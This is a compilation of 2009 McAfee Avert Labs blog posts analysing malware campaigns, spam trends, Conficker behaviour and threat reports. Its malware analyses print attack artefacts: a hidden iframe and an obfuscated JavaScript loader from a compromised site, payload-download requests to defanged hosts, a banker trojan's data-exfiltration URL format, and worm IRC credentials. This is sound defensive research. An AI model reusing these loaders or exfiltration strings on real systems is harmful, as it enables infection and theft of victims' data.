So, Iran had elections this weekend. Some people don’t agree with the results. As a consequence, some people are organizing DDoS attacks against Iranian websites, more precisely:

http://www.leader.ir/
http://president.ir/
http://www.irib.ir/
http://www.iribnews.ir/

and some specific URLs on those domains.

No guys, that’s not the right path and, as it is a malicious activity, we are detecting the tools being distributed to create this DDoS. In my opinion, I doubt that it would cause much damage, since this looks more like a media thing than a huge DDoS attack. The applications use old techniques and unless there are lots of “followers,” I don’t think that it will cause much impact. We will continue to monitor the situation.

Today we at McAfee Avert Labs released an excellent paper on browser attacks. Written by Christoph Alme, this paper deals with the many complexities of browser security and attacks. From the paper:

Web Browsers: An Emerging Platform Under Attack
“The widespread use of highly interactive “rich client” web applications for e-commerce, business networking, and online collaboration has finally catapulted web browsers from straightforward HTML viewers to a full-blown software platform. And as corporate users are performing a significant portion of their work on the web, whether it’s researching or collaborating, the safety of the underlying platform is critical to the company’s success. ”

Other areas the paper covers include:

• The shift in spam to mainly malicious web link usage

• “Web 2.0” sites—whether weblogs, social networking or portal sites—are increasingly spammed with links to malicious sites

• Legitimate sites are compromised and misused to either host malicious code or link to a malicious website

• Use of malicious video banners placed in advertisement networks

• Use of popular search terms to advertise and drive (search query) traffic to a malicious website. In a recent case in Germany, attackers used Google AdWords to attract users who searched for “flash player” to the attacker’s fake Adobe-look-alike site

Download the paper in its entirety here.

Today we released our Spam Report for the month of June. In it we discuss two key findings:

President Obama’s First 100 Days of Spam
Although you might imagine the change of administration in the United States would have a major impact on the Internet, the first 100 days of Obama’s presidency were mostly business as usual in the spam world.

Identifying Spam Trends of the Future
Even though we’ve been told to avoid clicking such links to prevent spammers from learning who we are, many of us forget to be vigilant because the overall detection accuracy of anti-spam products has improved. Recipients may instantly distrust an executable attached to an email, but they often feel unthreatened by a short blurb and a URL.

What does the future of spam hold for us? Spam is all about making money and, as with most businesses, spammer CEOs need to worry about costs and their bottom lines. As long we continue to behave as suckers, spammers will use sophisticated tactics to separate us from our money. Download the full report here.

It is ironic, but the rapid growth rate of malware attacks is partly due to how successful AV technology has become. If AV scanners were not so successful in blocking Trojans and viruses, there would be little need for the bad guys to write new ones. One can even say that malware writers are digging an elephant trap for all computer users because lots of new malware demands a response from AV, which can contribute to the slower operation of computers for all of us.

Figuratively speaking, the primary tools that the bad guys are using to dig their side of the trap and evade detection are packers (like UPX and Petite) and protectors (like Armadillo and Themida). Packers are legitimately used to reduce the size of programs (saving disk space), while protectors are legitimately used to prevent patching, hacking or reverse engineering. For malware production, however, packers and protectors are useful as they can often obfuscate original malware beyond recognition by AV.

Commercial protectors are especially loved by malware writers because they can put a protective envelope on top of, say, their spam-bot and it will be well hidden inside. Additionally, it will now really look more like a legitimate file obfuscated with the same protector. Malware writers use this trick more and more frequently.

As a result, on any average computer, AV can frequently encounter, say, a Themida-packed computer game and a Themida-packed spam-bot. To determine what is what an AV product has to know what is “under” the protecting envelope. Unfortunately, this simply cannot be done very quickly. It takes computing cycles…..

We would urge all developers who use software protection to think twice before doing so. There is an increasing risk that your legitimate files will be blocked by AV software by mistake or that there will be an unpleasant slowdown due to long analysis. Either can cause troubles for users. If you feel that you really must use an obfuscating protector at least digitally sign your files. That would reduce the level of suspicion by introducing traceability to the source.

The point is that software protectors are just not a secure software technology any longer because they have been misused so much. Do not use it if you can avoid it.

It was very encouraging to see that more than 40 people came to Budapest, Hungary, to discuss and agree on new industry standards as part of the effort undertaken by the Anti-Malware Standards Organization (www.amtso.org.) The awesome historic surroundings set the mood for our discussions.

Seeing such a great turnout in the current economic climate shows how much AMTSO members care about raising the standards of testing anti-malware products. Especially considering the recent rise in the number of rogue security products (such as the now infamous “Anti-virus XP 2009″), it is clear that we need transparent and fair testing more than ever.

AMTSO members finalized and adopted several new documents to the current portfolio. (Have a look at the collection of documents here: www.amtso.org/documents.html.)

But I would like to draw your attention to two papers that, in my opinion, represent very significant steps for the security industry as a whole.

• The first one is “AMTSO Analysis of Reviews Process,” and it presents the process of analyzing reviews. The creation of such a process paves the way to highlight great reviews and/or to expose substandard tests in public. (AMTSO promises to publish all the analyses they undertake.) I really hope that this process, designed to be transparent and fair, will improve the quality of testing and benefit both the developers and consumers of anti-malware technology. If you have doubts that this process is going to be unbiased I will remind you that AMTSO members work for competing security companies, and there would not be a snowball’s chance in hell to agree on the process if it were not designed to be fair. The next step is to put the “AMTSO Analysis of Reviews Process” into practice. I cannot wait to see how it will go.
• “AMTSO Best Practices for Testing In-the-Cloud Security Products” is the second very important milestone. Some anti-virus products started using “cloud” technologies (such as McAfee’s Artemis, which was launched in the beginning of 2008) and the number of cloud-based products is growing; so there is a need to address the fundamental problems associated with testing solutions that are not under the control of the tester. (That is, part of the product is not “in the hands” of the tester; moreover, it can change at any moment in time.) I think it is amazing that representatives of so many competing security companies agreed on fair and scientific principles of how to test cloud-based products. To be honest, when we started this effort we were rather sceptical about finding a sensible way to address all the problems that testers face when evaluating such technologies. The adoption of AMTSO best practices for testing in-the-cloud products means that our brainstorming was successful. I am very pleased to see the agreed results adopted and published. Thanks for that effort go to all the security researchers who contributed to the document and all AMTSO members who voted for it.

Today we launched a new web film series, entitled “H*Commerce: The Business of Hacking You.” The film series was created to expose cybercrime as a serious and universal threat that can no longer be ignored. Several of our own Avert Labs researchers lent a hand and their big ol’ brains to the project!

The term H*Commerce (or Hacker Commerce) is defined as the business of making money through the illegal use of technology to compromise personal and business data. Starting today, a new episode will be posted every two weeks here until all six episodes have aired.

The project was originally conceived as a series of standalone episodes, each focusing on different aspects of cybercrime: such as phishing, denial-of-service attacks, online scams, bank scraping, and fraudulent emails. As the filmmakers dug deep into the experience of H*Commerce victims, they realized the film’s focus had to be on the complex stories of real people doing normal online things, only to be horribly violated by ruthless cybercriminals.

Seth Gordon, director of films such as the 2008 theatrical release of “Four Christmases,” and the documentary “The King of Kong–A Fistful of Quarters,” was hired to direct “H*Commerce: The Business of Hacking You.” As Gordon began the research phase of the film, he identified an Oregon woman named Janella Spears, who was a victim of one of the largest and most elaborate email scams on record.

Spears’ story of losing more than $440,000, and the dire effects it had on her family and marriage, became the central theme of the film series. Over the course of the filming, Chris Roberts, a third-party cyberforensic expert, was introduced to Ms. Spears to provide advice on how to clean her system, handle the hackers, and help put an end to the cybercrime scams.

Watch, learn, and arm yourself with knowledge. Check it out at Stop H*Commerce.

The fight against cybercrime is showing some very promising progress over the last few years. We are certainly not where we want to be, but we’re on a good path. McAfee’s own Inititiative to Fight Cybercrime has been in force for more than a half-year. Recently our Cybercrime Response Unit was launched; it’s an online help center designed to assist victims (and people who suspect they may be victims) of cybercrime. But best of all: We are not alone!

McAfee has teamed with many other companies and institutions to form the Conficker Working Group and has set a precedent that raises hope for the future. Just this week I attended the Counter eCrime Operations Summit (CeCOS) in Barcelona, Spain. The event was hosted by the Anti-Phishing Working Group (APWG). This year’s meeting focused on the development of response paradigms and resources for managers and forensic professionals who fight ecrime. There were a number of very useful presentations and panels on user education, better interaction among various entities, and case studies on how successful this can be.

Even more important were the small meetings outside the offical program, connecting researchers from security companies, CERTs, and law enforcement agencies throughout the world with each other and talking over how we can improve the current situation. This has been a very productive week. At least I now have some hope for the future!

Today McAfee Avert Labs released its Threats Report for the first quarter of 2009. In it we reveal that cybercriminals have taken control of almost 12 million new IP addresses since January, a 50 percent increase since 2008. The United States is now home to the largest percentage of botnet-infected computers, currently hosting 18 percent of all zombie machines. Seems the bad guys are attempting to recover from last November’s takedown of a central spam-hosting ISP by rebuilding their army.

Other Key Findings

The Koobface virus has made a resurgence, and more than 800 new variants of the virus were discovered in March alone.

Servers hosting legitimate content have increased in popularity with malware writers as a means for distributing malicious and illegal content.

Cybercriminals are increasing their use of URL redirects and Web 2.0 sites to disguise their locations.

Compared with the overall landscape, the Conficker worm represents a small subset of all threat reports. AutoRun malware, on the other hand, represented 10 percent of reported detections during the first quarter–quite a bit more than Conficker itself.

You can find the full text of the “McAfee Threats Report: First Quarter 2009″ here.

We have been getting quite a few requests for screenshots of swine flu spams as well as the e-pharmacy sites they link to. Your wish is our command. …

The image below is a collection of a bunch of swine flu spams:

You may notice several things here. First they are mainly text and links. Next, they use some good keywords: Obama, Gore, Madonna, Salma Hayek, and swine flu itself. Notice the linkage? They all seem to point to the .cn domain. Yes, .cn is China, but they are all redirects. When I looked at the Internic registry info it was a round-robin of Chinese and Russian domains and NS records.

Here is a screenshot of the e-pharmacy they all lead to:

You guessed it. It’s our old friend the “Canadian” e-pharmacy. Very clean and professional looking indeed; make sure you avoid these.

As we have pointed out for the last several days, these people are bottom feeders. My colleague Guilherme Venere quite clearly showed in his recent post that they are now linking directly to malware as well, so it is important to stay updated and educated.

Remember, if you need credible information on swine flu, go directly to the World Health Organization’s website. And if you need meds–maybe a ride to the doctor would be safer.

It’s been just a few days since we started talking about spam using Swine Flu as a way to catch user’s attention to sell pills. This time, however, the message is not very “healthy”:

The message above is in Portuguese, and goes like this: “For those who still don’t know, the pictures below show the Swine Flu terminal stage, the experts are trying to calm people down, but the pictures show that calm down is the only thing we shouldn’t do. See how the patient becomes in advanced stage”.

As we saw yesterday on David’s post, Brazil is the number one source of spam related to Swine Flu. In this case, the spammers use the name and logo of the biggest TV network in Brazil, Rede Globo, to catch user’s attention. But remember, this is a spam; they use this to make users believe that the news is true.

Links lead to two different malware files:

http://cch.[removed].dk/images/thumb/xxx/alerta.php?atencao=visualizar

=> Foto.29.04.2009.com

http://[removed].ru./uploaded/alerta.php?atencao=ver

=> Foto.29.04.2009.jpg.exe

They are identified as PWS-Banker-dldr and PWS-banker-gen.g

The file Foto.29.04.2009.com is a downloader which drop the URL below as C:\WINDOWS\temp\configura.exe

http://201.xx.xxx.xxx/manual/programs/ht/ht/zu/zu/abrir/Pcrazy.gif

And this file is identified as PWS-Banker-gen.b

This is a common banker malware which overlays a fake image over real the banking site. Here’s an example of a sequence telling the user his account will be suspended if he doesn’t update his information with the bank, then asking him to enter their personal information and even his credit card data: 

The information about the hacked machine and banking data are then posted to the sites below:

hxxp://[removed-1].100webspace.net/post.php

hxxp://[removed-2].100webspace.net/post.php

hxxp://[removed-3].100webspace.net/post.php

hxxp://[removed-4].100webspace.net/post.php

This is the strings appended to the URLs above:

tipo=inf&tip=[machinename]+[username]&inf=INFECTADO%0D%0A&

But one image inside this malware called our attention. The image below tries to disguise itself as the website for the Brazilian National Security Agency (SENASP), a site used by Brazilian law enforcement agents to research information about Brazilian citizens:

They attempt to steal usernames and passwords for this site. If the miscreants get access to this site they would be able to get information about any Brazilian citizen they want, even the president. Now tell me about identity theft!

As we can see an apparently innocent e-mail could cause your banking information to be stolen and even have more serious implications as the case above.

Following up on Chris Barton’s excellent blog the other day on swine flu spam, we wanted to take a closer look at the numbers…..

Many people may not realize that the words “swine” and “flu” had really not been seen in spam before this past weekend and almost certainly not together in the same subject line, so we kinda started there. Using our Trusted Source technology and intel I was able to pull the following chart on the sheer growth in the words “swine” and “flu” when used just as a subject for the last several days:

Bear in mind that is NOT daily volume growth but rather the growth in its use as a subject.

From the beginning of the campaigns we have seen it generated from all over the world, not really a surprise when one considers the global nature of botnets and spam anyway but the country breakdown is interesting to look at. Seems that Brazil, the United States and Germany are the biggest producers/sources at the moment:

No safe country from spammers eh? When you consider that on any given day there is between 80 to 170 billion email messages with 78 to 90 percent of that number being spam, sending with the subject of “swine flu” gives these criminals a high chance of success due to the media attention the subject is already getting. Social engineering is one of the most successful and dangerous tools at the spammers disposal and it is very hard to protect against.

We have also seen sites with the words “swine” and “flu” pushing malware as well. In this case its a redirect to a Russian-based site that requires our old friend the fake codec be installed to view the movie:

Malware writers, spammers and scammers are low lives. They will use any high media event or high impact news story to push their wares including the sickness and misery of others. Stay vigilant and stay safe. Should you need credible information on the influenza pandemic then go to The World Health Organization website.

There has been a bit of chatter today about the first ever Mac-based botnet. This piece of malware actually appeared back in January of this year.

Quite frankly there is not any functionality in this “bot” (some would simply call it a remote access trojan but let’s not split hairs OK!!) that we have not seen before. The only thing of concern here is that it does affect the Mac platform which certainly is fresh territory.

As we had discussed in our previous blog, it is spread through pirated software at this point (a huge No, No anyway) so hopefully distribution will be light and not result in a large numbers. It definitely does highlight the need for security software regardless of platform!

Today McAfee has released The Carbon Footprint of Email Spam Report. The study looks at the global energy expended to create, store, view, and filter spam across 11 countries: Australia, Brazil, Canada, China, France, Germany, India, Mexico, Spain, the United States, and the United Kingdom. The report correlates the electricity spent on spam with its carbon footprint, because fossil fuels are by far the largest source of electricity in the world today. Since emissions cannot be isolated to one country, the study averages its findings to arrive at the global impact. Key findings include:

• The average greenhouse gas (GHG) emission associated with a single spam message is 0.3 grams of CO2. That’s like driving three feet (one meter); but when multiplied by the yearly volume of spam, that amount is equivalent to driving around the earth 1.6 million times.
• Much of the energy consumption associated with spam (nearly 80 percent) comes from users deleting spam and searching for legitimate email (false-positives). Spam filtering accounts for just 16 percent of spam-related energy use.
• Spam filtering saves 135 terawatt hours (TWh) of electricity per year. That is equivalent to taking 13 million cars off the road.
• If every inbox were protected by a state-of-the-art spam filter, organizations and individuals could reduce today’s spam energy by 75 percent or 25 TWh per year, the equivalent of taking 2.3 million cars off the road.
• Countries with greater Internet connectivity and more users, such as the United States and India, tend to have proportionately higher emissions per email user. The United States, for example, had emissions that were 38 times that of Spain.
• While Canada, China, Brazil, India, the United States and the United Kingdom showed similar energy use for spam by country, Australia, Germany, France, Mexico, and Spain came in about 10 percent lower. Spain had the lowest figure, with both the smallest amount of email that was received as spam and the smallest amount of energy use for spam per email user.

Not only is spam related to cybercrime and a nuisance, but it also impacts the environment. Download the study here. It’s worth a read.

So April 1st came and went, and it seemed that all might be right in the post-Conficker world…

Of course, nothing is that easy. With the latest activity, there is also a continual flood of information out there. Below, I have attempted to aggregate the new functionality.

Around April 7th/8th Conficker started to move again. Our peers were able to confirm this new update functionality.

When it did wake, it used the peer-to-peer (P2P) communication channel to call home rather than the HTTP rendez-vous to start its latest escapade. In this case, the infected host will be contacted initially by another host over an ad-hoc P2P connection. Kind of like an alarm clock. Then, after hitting the snooze button over a period of several hours, the communication begins again - starting this time from the infected host.

Conficker is definitely not in any rush to tango. Communication is done in such a manner that this traffic (aka update) may go unseen - or at least mostly under the radar, by using fragmented and irregular UDP communication.

So what happens next? When this P2P communication stream ends, our host is basically told to go to a domain and download a file. This is when TCP comes into play. Our infected host goes out to an address and an encrypted executable file is downloaded. Once executed, it could contain malware such as the ever-changing FakeAlert or even Waledac. So at the end of this round, we may be left looking at something similar to the below screenshots:

We have also seen some hosts serving up a Waledac payload.(Realistically, it may contain anything that the bad guys are serving up on those domains.)

These downloads are detected as FakeAlert-SpywareProtect and Waledac.gen.b respectively.

Also downloaded as part of the payload, we again have the MS08-067-like “hot” patch. This time however, it is closer to the original patch - so as to elude detection. (Note: our McAfee Conficker Detection tool is in process of being redesigned to allow detection of the latest variants).

There are also two other notes of interest. The first of which is that we have a new deadline to watch. On May 3rd this latest variant is set to expire.

Thinking aloud, this point brings some interesting questions to mind. Such as - Is this just a test from the Conficker crew who are serving up Waledac incidentally? Or is this done for other self-serving reasons? (i.e. - Attention diversion) Maybe it’s just a deadline for a rented botnet? Interesting questions I am sure the security community at large is wondering.

Second, when an infected host resolves a HTTP rendez-vous domain name, it compares the IP resolved with the list of IPs it already queried, if the new IP is in the list, it will move on to the next domain in its list.

Of course, we will update if anything else comes along…

Microsoft recently reported a new worm found to be exploiting the MS08-067 software flaw in the wild.  Even though our products already detected it generically as W32/IRCbot.gen.a, we decided to take a closer look and make sure we proactively detect all components that the worm might be dropping or downloading.

When run, W32/IRCbot.gen.a copies itself to <system folder>\netmon.exe.  It then drops a rootkit as <system folder>\drivers\sysdrv32.sys (MD5: 0e219b74e2c68a34ca09d8fe114f6d11) and hooks the Windows tcpip.sys driver to remove the outbound connection limits in Windows XP Service Pack 2 and newer. We successfully detect this rootkit as Generic Rootkit.g trojan.  It then follows to establish an outbound connection with a remote IRC server using following credentials:

• PASS h4xg4ng
• NICK [00-USA-XP-9215671]
• USER SP2-ojd, followed by the name of the infected computer.

This worm exploits the MS08-067 vulnerability indeed, and uses a download-and-execute shellcode which behaves in an identical fashion as Conficker’s exploit, with only some differences in implementation. It is encoded using a simple 1-byte XOR key and looks like any other standard PEB shellcode which loads API libraries (i.e. urlmon.dll) and executes URLDownloadToFile() to download malware from already infected systems into new targets. Unlike Conficker which injects a downloaded DLL into running Windows processes, this worm downloads and installs a 66.scr executable file instead.

As mentioned, the Conficker worm uses an exploit derived from the “ms08_067_netapi” Metasploit module to spread itself.  The Metasploit framework has become a popular platform for security tools development and automation. As we can see, the latest version of Metasploit is not only used by whitehatsfor vulnerability assessments and penetration testing, but also for malware development. The W32/IRCbot.gen.a worm is not an exception, it has remote language detection taken from Metasploit’s “smb_fingerprint()” routine implemented in the “smb.rb” module, as well as dcerpc service connection testing code located in the “client.rb” module. By using these routines,  new worm can conveniently determine which operating system and service pack it is targeting to achieve a better infection success rate. The way how W32/IRCbot.gen.a ordered the attack packets is identical to Metasploit’s MS08-067 module  (ms08_067_netapi.rb):

Both Conficker and W32/IRCbot.gen.a uses open source tools similarly to their advantage to make their work much easier.

We went on to investigate additional sites where the worm is connecting to and the payload that it is trying to download. Packet sniffer logs shows that it accesses at least two other remote servers:

• hxxp://98.1[infected].42:443/n
• hxxp://74.2[infected].90:88/jueo.exe

While the first server is not showing any technical activity at the time of research, the second server is still active and hosts additional malware that is installed into infected machines:

Well, hello Donbot ! Upon investigation, the downloaded malware (MD5: 916DB2E2C2D1ED7AF89DD8EBB9C7D84C) detected generically as Generic.dx appears to be a component of an active botnet called Donbot (also known as Bachsoy). Components of Donbot typically create a proxy on infected machines and may be used to relay spam and HTTP traffic. Except for a few, most AV vendors seem to have detection for this malware.

Until recently, Donbot has been a relatively minor player in the lucrative spam business, but it certainly looks like the Donbot authors have decided to expand the potential of their botnet . While other botnets - namely Cutwail and Rustock continue to dominate the distribution of spam, Donbot is making an eager attempt to get a bigger share of the spam revenue pie as one of the top 5 most active botnets worldwide. Clearly, worm authors are focusing on growing their botnets as they might not get another chance like the MS08-067 exploit in a long time.

This would also serve as yet another reminder that there could well be many computers on the Internet that are still not installed with the latest security updates - more than 5 months since the release of the MS08-067 patch.

A lot has already been written about Conficker. There had been excellent analysis reports published by SRI, The Honeynet Project and others. Vinay Mahadik and I would like to present some findings on the network aspects of the Conficker.C behavior. 

We setup a small testbed that had a machine infected with Conficker.C in a controlled environment; and another Linux box that was customized for packet mangling. This enabled us to intercept or mangle the packets exchanged between the infected machine and the outside world. We monitored the activity of the infected host over several days. We classify the test into two phases: Pre- April 1st and the April 1st phase.

During the Pre- April 1st phase we observed the following.

Conficker.C gets the current time from some of the popular websites. This involves sending a DNS query to the name server to resolve the IP address of the website which is followed by a HTTP GET request to that IP address. The below figure illustrates an attempt made to craigslist.org:

Conficker.C also sends UDP and TCP probes to locate its peers. We observed fairly aggressive and simultaneous UDP & TCP scans. The volume of the UDP scans was particularly high - roughly 2-3 UDP queries per second and seems to taper down as we got closer to April 1st. As most of the randomly generated IP addresses were not live or did not have the targeted ports opened, there were a large number of ICMP messages received – port unreachable , host unreachable, time-to-live exceeded.

“April Fooling Conficker.C”

In the April 1st phase, we intercepted and manipulated the HTTP date check query responses, so that for every website that Conficker.C queries, it gets a response with a date stamp of April 1st, 2009. The local system time was also set to April 1st. By controlling the only 2 date check sources, we managed to fool the malware into thinking it was indeed April 1st! Soon after, we observed numerous DNS queries for the generated domain names.

There were a few instances where Conficker.C did discover peers out there, and exchanged short UDP packets with them over several minutes. We were extremely curious about them.

Vinay Mahadik reverse engineered the 95+ conversations, across some 50K+ UDP peer discovery packets, and found some patterns in both the requests and responses. These patterns are valid for both the pre- April 1st and April 1st UDP scans. Based on this, we have incorporated a new heuristics into our latest Network Security Platform Signature set 5.1.16.15, or 4.1.46.16.

McAfee Network Security Platform (Intrushield) customers can observe the following alerts.

• WORM: W32/Conficker.C Activity Detected
• HTTP: Suspicious Time Check Detected

The figure below illustrates the alert viewer drilled down by a Source IP that has generated the “WORM: W32/Conficker.C Activity Detected ” alert.

 (Both Vinay Mahadik and Ravi Balupari have contributed to this research blog)

Hello, it is now April 1st for at least Asia Pacific and Europe. We’ve been blogging and posting various resources about ways to protect against the Conficker worm up to its “activation day”:

•  “More Comments Regarding Conficker“
•  “W32/Conficker: Much Ado About Nothing?“.

The day has finally arrived.

McAfee Avert Labs has been closely monitoring Conficker-related threats and, we haven’t observed any significant activities on the domains that it is polling for thus far. Even so, please remain vigilant and watch this space for any further updates to the current status.

On measures to protect yourself and your organisation against Conficker, please visit:

• http://www.mcafee.com/us/threat_center/conficker.html

Don’t you like when legit obfuscated javascript is mixed with the malicious one?
Also, don’t you like when the malicious one is linked with several redirection, referrals, exploits and other malwares?

So, here is the story…
Once upon a time a user was checking for a service on google and found one that fits the need…
The site is a innocent (until proved otherwise) website that exists for some years to announce a specific type of service.
The site uses all those fancy (and legit) javascript to give some special effects to the website.

Indeed, real special effects…because when you get in there, all the magic happens…:)

From the user standpoint, he just went to the website, lets call it specialeffectsservices.domain, and suddenly his machine is owned, and the AV starts to pop up with alerts…

A more closer view reveals what happened:
Among all .js file on the website, there is one that besides the regular fancy javascript, there was one not so innocent…

The script was obfuscated with the known (p,a,c,k,e,d) function.

I managed to deobfuscated and found the following iframe:
[iframe width=1 height=1 src='hXXp://[REMOVED]-atm.net/b2b/’style=’display:none’ > ></iframe]

If you go to [REMOVED]-atm.net website, you will find the nice message:

H@K3D 8Y J@KE-M1L

If you go to [REMOVED]-atm.net/b2b you will be redirected to files[REMOVED].net

The files[REMOVED].net also contains a folder called b2b with another obfuscated script (which you are only able to see with the right referral):

[SCRIPT LANGUAGE="JavaScript"]
function spl(){var
crypted=”60!83!99!114!105!112!116!32!76!97!110!103!117!97!103
!101!61!39!74!97!118!97!83!99!114!105!112!116!39!62!13!10!98!111!102!40!
41!59!32
.
.
.
3!125!125!32!13!10!60!47!83!99!114!105!112!116!62!”;var
i,out=”",temp=”",c=0;l=crypted.length;do{while(crypted.charAt(c)!=’!')temp=temp+crypted.charAt(c++);c++;
out=out+String.fromCharCode(temp);temp=”";}while(c<=crypted.length-1);document.write(out);}
spl();
[/SCRIPT]

When I finally were able to deobfuscate it, it was possible to see that it was leading to even another redir, in the same site,as you can see:

q.open(’GET’,'hXXp:// files[REMOVED].net/b2b/load/’,0);

The /load folder will push a PE file to user’s machine, on c:\ usually with a name T.exe .

Of course it does not stop there…:)

The T file is a downloaders, which will then download 2 additional files from the same domain plus another one from hansali[REMOVED].com

As an additional information, files[REMOVED] is the C&C from the malware installed.

And yes, we detect them all…:)

In the run-up to April 1, the media spotlight around the latest Conficker worm variant has reached a morbid frenzy. From being touted as an “April Fool’s joke” to outrageous headlines such as “Millions of computers expected to be destroyed”–no other worm in recent history has generated this much media attention. But what have we learned from history? From the days of Michelangelo to the recent Blaster, SoBig, Sober, and Kamasutra worms, the hype surrounding the activation or payload dates of major Internet worms have turned out to be only damp squibs.

What happens on April Fool’s Day is anyone’s guess. Although we still don’t know the real intent of the authors of the Conficker worm, they have consistently improved the worm by adding new functionality and anti-debugging tricks with every released variant. In order to resist the Conficker Cabal initiative, which recently blocked domain registrations associated with previous Conficker A and B variants, the worm authors upped the randomly generated domain count from 250 to 50,000. The intent behind generating and attempting to contact so many domains is to make it extremely difficult for security researchers to monitor sites that could potentially host a payload for the Conficker worm to download and execute.

What we do know is almost all the security vendors have thoroughly analyzed Conficker–also known as Downadup and Kido worm–and have good generic detection and cleaning in place. Uploading a couple of randomly selected Conficker binaries to the VirusTotal site consistently shows an overall anti-virus detection rate of 90 percent or above. And these high detection rates are across vendors–small or big.

To prepare for any trouble on April 1, McAfee now offers a special build of its standalone cleaning tool Stinger, which will be updated on a daily basis to include any undetected Conficker variants from the wild. This special build of Stinger can be downloaded from the Avert Tools site. We’ve also posted detailed documentation on mitigation steps that security staff within organizations can take to combat W32/Conficker. Additional McAfee product coverage information for MS08-067–the Microsoft Windows Server Service vulnerability, which is exploited by the worm–can be viewed at the McAfee Threat Center.

Please ensure that your copy of Microsoft Windows is patched and your security software is fully up to date. That way you won’t end up an April Fool.

Users should always take care while surfing the Internet and reading mail, and today maybe more than usual: Another spam run from the Waledac botnet is on the loose, this time misusing the good reputation of the news agency Reuters. After the “President Inauguration,” “Valentine Scam,” and the “Economic Crisis,” this time the social-engineering trick is a “Terror Attack” in your city. Mails with subjects such as “Why did they explode bomb there?” or “Why did it happen in your city?” are being sent out by the botnet right now.

Again the bad guys are using geolocation services to better target their audience. As described in my earlier blog, they are using the city name of the user visiting the fake website and inserting this name into the website itself. So the “breaking news” gets even more attention, because when an attack happens in your home town, everyone would be anxious and curious, right? The screenshot below is an example what a user from New York would see; other users would see the same message but with their local city being “attacked”:

The website claims that a “dirty bomb” exploded in the user’s city and that at least 12 people have been killed. A video from Reuters is presented but “You need the latest Flash player to view video content. Click here to download.” It’s another example of the time-worn missing-codec trick. The needed “update” named main.exe or save.exe is in fact the real malware.

The fast-fluxing website also includes a malicious IFRAME that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection.

The Waledac/Storm authors try to keep their botnet running and always craft new social-engineering tricks to fool unsuspicious users to follow their lure. As always, the best advice is to not click links in spam mails. And the malicious IFRAME pointing to a drive-by infection is another good reminder that “curiosity killed the cat.”

The third edition of our monthly spam report was released today. This edition discusses some fascinating topics. Key findings include:

Spam campaigns are taking advantage of “partitioning” to increase their effectiveness and combat the efforts of security tools to reduce their reach.

Replica-watch spam has taken over the number one position for holiday spam.

Business leaders and legislatures have promised to stamp out spam, yet the plague persists. Does reputation-based security hold the key?

Putting a dollar value on productivity lost due to spam.

The topic of lost productivity and bringing quantifiable numbers to the impact of spam on a business is particularly interesting and worth a solid read. Download a copy here.

A new spam run is on the loose, misusing the global economic crisis as its social-engineering vector. Consumers looking for a bargain should take care, because the bad guys exactly want to fool people trying to save some money these days. Spam mails promoting bargains, which could help in the recession, are hitting the inboxes right now.

When users follow a link in such spam mails–but please don’t do that!–a website like the one below appears:

After the Valentine’s Day theme, the malware authors behind the Waledac botnet changed their lure to promote free coupons, pretending to “save” consumers a lot of money. The text states: Exclusive sale coupons and deals at over 100 000 stores in <City>, <Country>. You can find these amazing sale offers and coupons ONLY HERE! You can download free online and printable coupon list. In our list there are most popular stores, restaurants and companies in <City>, <Country> with discounts up to 95%. We help you to survive this crisis! The coupon list is named “couponslist.exe,” “sale.exe,” or “print.exe”–and, in fact, is malware.

In economically hard times, the malware authors do not rely only on clever and timely social engineering, they also include a malicious IFRAME in the website that refers to malicious code trying to exploit unpatched computers with an additional drive-by infection. Furthermore, the website is craftily designed. The bad guys are using geo-location services to better target their audience. So when someone connects to the website, it determines the geographical location on the fly and presents the actual location in the website texts. When a victim sees coupons for exactly his town, this will increase the demand for the bargain list.

As a last piece of advice we can only stress again that consumers should always take care with offers that look too good to be true–even more so in the hard times of a global economic crisis. Please also refer to our predictions for 2009 “Cybercrime, Online Threats, and the Recession.”

Following our warning, last week, of the possible scams related to the approaching Valentine’s Day, it’s no surprise that today we’ve seen another new Valentine theme come up–hosted on the fast-fluxing Waledac botnet. If a user were to follow the link in these spam emails–and please don’t do that!–a web site like the following would appear:

A picture with two adorable Shih Tzu puppies is wishing a Happy Valentine’s Day. The text of the lure is advertizing a “Valentine Devkit” named loveexe.exe or start.exe. And regular readers can guess it already: This is a social-engineering trick to convince users to download the real threat. Don’t click the link to the executable or you will end up with malware.

A close look into the website’s source code doesn’t currently reveal any additional drive-by infections nor downloads (but that can change quickly), as seen in past Waledac (or “Storm”) themes. Coverage of this particular malware variant is in the 5522 DATs, plus blocked by Artemis, plus blocked at the (former Secure) Web Gateway as well.

As the recession continues and unemployment rises, we foresee the top cybercrime trend for 2009 as the continued exploitation of the financial crisis to scam people with fake financial transactions services, bogus investment firms, and fraudulent legal services.

A related trend will be cybercriminals targeting people looking to advance or change their careers through further education. McAfee® Avert® Labs researchers have seen major spikes in diploma and advanced-schooling scams that have coincided with major corporate workforce reductions in the car manufacturing, chemical, and technology industries.

Our Main Threat Predictions/Trends for 2009:

• Threats on Social-Networking Sites. Cybercriminals no longer deliver threats only via spam. They are taking advantage of Facebook, MySpace, and other popular social-networking sites. McAfee expects this trend to continue throughout 2009, eventually displacing more traditional ways of malware distribution such as email.

• Personalized Threats Speak Your Language. McAfee expects to see the continued expansion of malware in languages other than English. Cybercriminals have come to realize that by diversifying into a global market they can access even larger pools of valuable identity and confidential information.

• Malware Targets Consumer Devices. McAfee expects increased attacks involving USB sticks and flash-memory devices used in cameras, picture frames, and other consumer electronics. This trend will continue due to the almost unregulated use of flash storage across enterprise environments as well as their popularity among consumers.

• Security Software Scams. The malware underworld is using mainstream practices in an effort to “sell” security software that is either misleading or outright fraudulent. McAfee expects this trend to continue.

• Abusing Free Web-Hosting/Blogging Services. Websites such as Geocities, Blogspot, and Live.com allow anyone to create a public website for free, without the authentication necessary when purchasing a domain-name website. This gives spammers the opportunity to run their underground business with minimal expense. Spam from do-it-yourself social-website-hosting providers arrives at its destination with far greater frequency than links pointing to domain names assigned by legitimate registrars. With little to no threat of punishment for their hosted content, and the new restrictions on short-term domain tasting, the attractiveness of free bandwidth offered by these sites will undoubtedly draw greater focus from malicious parties.

• More Targeted Phishing and Corporate Blackmailing. Botnets, a.k.a. zombie computers, that spread into corporate networks and financial datacenters will increasingly be used to gather sensitive information that can be used for blackmail or sold on the underground market.

• Browser-Based Attacks. Cybercriminals will increasingly attack via web browsers as they are the least-protected and, therefore, easiest way to transfer malware.

• Security Breaches of Confidential Data. Information that is managed by partner and subsidiary companies of bigger companies will be exposed more frequently, forcing an overhaul of data-security practices.

